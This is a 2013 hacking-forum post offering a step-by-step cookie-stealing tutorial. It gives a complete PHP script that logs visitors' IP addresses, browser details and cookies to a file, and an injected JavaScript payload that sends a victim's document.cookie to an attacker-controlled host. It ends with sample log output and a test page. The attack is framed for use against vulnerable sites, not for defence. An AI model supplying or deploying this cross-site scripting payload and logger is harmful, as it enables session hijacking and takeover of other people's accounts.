franxu Posted January 6, 2013 Report Posted January 6, 2013 Salut un nou tutorial.1) First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php . You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData();echo '<b>Cookie Stealing</b>'?>This script will record the cookies of every user that views it . 2) Now we need to get the vulnerable page to access this script.<script> document.location = 'http://yourwebsite/whateveryouwant.php.php?cookie=' + document.cookie; </script>3) Open log.txtIP: x.x.x.x | PORT: xxxx | HOST: | Agent: Mozilla/5.0 (***; Fedora; Linux ****; ***.*) *****/******* Firefox/**.0 | METHOD: | REF: http://VictimWebsite/ | DATE: Sunday 21th 2012 December 2012 12:12:12 AM | COOKIE: cookie=cookie_name=exempleBonus : If you want to test this<?php setcookie('cookie_name', 'exemple', (time() + 3600)); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head> <title>Test</title> </head> <body> <script> document.location = 'http://Yourwebsite/whateveryouwant.php?cookie=' + document.cookie; </script> </body> </html>sursa: hacksociety Quote
